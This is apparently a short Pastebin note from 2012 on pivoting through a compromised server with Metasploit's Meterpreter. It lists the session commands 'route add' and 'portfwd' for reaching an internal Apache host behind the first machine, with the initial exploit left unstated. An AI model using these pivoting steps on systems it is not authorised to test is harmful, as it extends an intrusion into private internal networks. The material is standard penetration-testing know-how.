Advertisement
Guest User

Port Forwarding w/ Meterpreter

a guest
Mar 26th, 2012
788
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.54 KB | None | 0 0
  1. Port Forwarding w/ Meterpreter
  2.  
  3. ATTACKER -----> INTERNET -----> SERVER1 -----> SERVER2
  4. meterpreter apache :80
  5.  
  6. Server1: Public IP: 200.164.10.20 Server2: LAN IP: 10.10.10.20
  7. LAN IP: 10.10.10.10
  8.  
  9. 1 - Exploit server 1 w/ metasploit-meterpreter (figure it out how)
  10.  
  11. 2 - Add Route
  12. meterpreter> route add 10.10.10.10 255.255.255.0 3 (3 = metrepreter session ID)
  13.  
  14. 3 - Set port forward
  15. meterpreter> portfwd -l 25000 -p 80 -r 10.10.10.20
  16.  
  17. 4 - use Firefox to access Apache (10.10.10.20)
  18. http://127.0.0.1:25000
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement